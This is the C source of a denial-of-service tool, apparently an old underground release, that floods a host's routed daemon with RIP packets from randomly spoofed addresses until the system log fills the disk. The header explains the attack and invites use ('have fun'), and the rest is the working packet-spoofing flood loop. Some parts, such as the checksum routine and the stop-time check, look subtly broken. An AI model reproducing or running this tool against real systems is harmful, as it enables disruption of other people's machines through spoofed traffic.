/*
   routedsex.c by xt of XOR (brandon@james.kalifornia.com)
   DoS attack against the routed daemon.
   
   description:
    i noticed a while back, when i was screwing with routed, that
    RIP packets destined for routed (port 520) caused it to log
    an 'unknown router' error to the system log. if i flooded
    it with the same spoofed IP address, it would just say that
    the last message was logged X times. but, if they're randomly
    spoofed, it logs each one. so this causes a DoS attack against
    the hard drive space of the system. the syslog will eventually
    fill up. run this program a couple of times against a host to
    make the system log fill up even quicker. here's an excerpt from
    the /var/log/syslog file on my system:
      ... routed[3067]: packet from unknown router, 45.138.23.14
    and many, many, many more.. 800K file so far after 40 seconds
    of attacking it.

   this has been tested on slackware linux 7.0. should work on all
   linux, may need a couple of tweaks to compile on some distributions,
   such as the ever so crappy RedHat and it's clones (i *HATE* redhat).

   anyways, have fun. btw, XOR is looking for more members.. if you're
   interested in joining, read http://xorteam.cjb.net.
   
                                                         - xt
*/
   
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <protocols/routed.h>
#include <linux/route.h>
#include <arpa/inet.h>

/* i think i took this line from a syn flooder.. */
#define ranipbit(a, b) ((rand() % (((b) + 1) - (a))) + (a))

u_short chksum(u_short *addr, int len)
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1) {
    sum += *w++;
    nleft -= 1;
  }
  
  if (nleft == 1) {
    *(u_char *) (&answer) = *(u_char *) w;
    sum += answer;
  }

  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

int dolphin (int sock, struct sockaddr_in *sin, char *rp, int sizerp, u_long source, u_long victim)
{
   struct udphdr udp;
   struct iphdr ip;
   char packet[8092];
   int ret;
   
   ip.id = htons(31337 + (rand() % 100));
   ip.frag_off = 0;
   ip.ttl = 255;
   ip.protocol = IPPROTO_UDP;
   ip.ihl = 5;
   ip.version = 4;
   ip.tos = 0;
   ip.tot_len = htons(28 + sizerp);
   ip.saddr = source;
   ip.daddr = victim;
   ip.check = chksum((u_short *) &ip, sizeof(ip));
   
   udp.source = htons(520);
   udp.dest = htons(520);
   udp.len = htons(8 + sizerp);
   udp.check = 0;
   
   memcpy(packet, (char *) &ip, sizeof(ip));
   memcpy(packet + sizeof(ip), (char *) &udp, sizeof(udp));
   memcpy(packet + sizeof(ip) + sizeof(udp), (char *) rp, sizerp);

   ret = sendto(sock, packet, sizeof(ip) + sizeof(udp) + sizerp, 0,
                  (struct sockaddr *) sin, sizeof(struct sockaddr_in));
   
   return ret;
}

int main(int argc, char **argv)
{
   u_long victim, stop = 0, srcaddr, udelay = 100;
   int sock, dos = 1, riptype = 1;
   
   struct sockaddr_in sin;
   struct rip rp;
   struct netinfo *neti = rp.rip_nets;
   struct hostent *hp;
   
   if (argc < 4) {
     fprintf(stderr, "routesex.c by xt of XOR\n");
     fprintf(stderr, "usage: %s <victim> <usleep> <time [put '0' for continuous]>\n", argv[0]);
     return 0;
   }
   
   udelay = atol(argv[2]);
   if (!udelay)
     udelay = 100;

   stop = atol(argv[3]);
   if (!stop)
     stop = 0;
   else
     stop += time(0);

   if ((hp = gethostbyname(argv[1])) == NULL) {
     perror("gethostbyname");
     return -1;
   } else
     bcopy(*hp->h_addr_list, &victim, sizeof(hp->h_addr_list));

   if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
     perror("socket");
     return -1;
   }
   
   sin.sin_family = AF_INET;
   sin.sin_port = htons(520);
   sin.sin_addr.s_addr = victim;
   
   rp.rip_vers = RIPVERSION;
   neti->rip_dst.sa_family = htons(AF_INET);
   memcpy(rp.rip_nets, neti, sizeof(neti));
   
   printf("RIP'ing %s!\n", argv[1]);
   
   while (dos) {
     int a, b, c, d;
     char buffer[32];

     a = ranipbit(0, 255);
     b = ranipbit(0, 255);
     c = ranipbit(0, 255);
     d = ranipbit(0, 255);

     rp.rip_cmd = riptype;
     neti->rip_metric = htonl(riptype);

     if (riptype == 4)
       riptype = 1;

     snprintf(buffer, 32, "%d.%d.%d.%d", a, b, c, d);
     srcaddr = inet_addr(buffer);

     if ((dolphin(sock, &sin, (char *) &rp, sizeof(rp), srcaddr, victim)) == -1) {
       perror("sendto");
       return -1;
     }
     
     riptype++;

     usleep(udelay);
     
     if (!stop) {
       if (time(0) == stop)
         dos = 0;
     }
   }

   printf("Finished.\n");
   close(sock);
   return 0;
}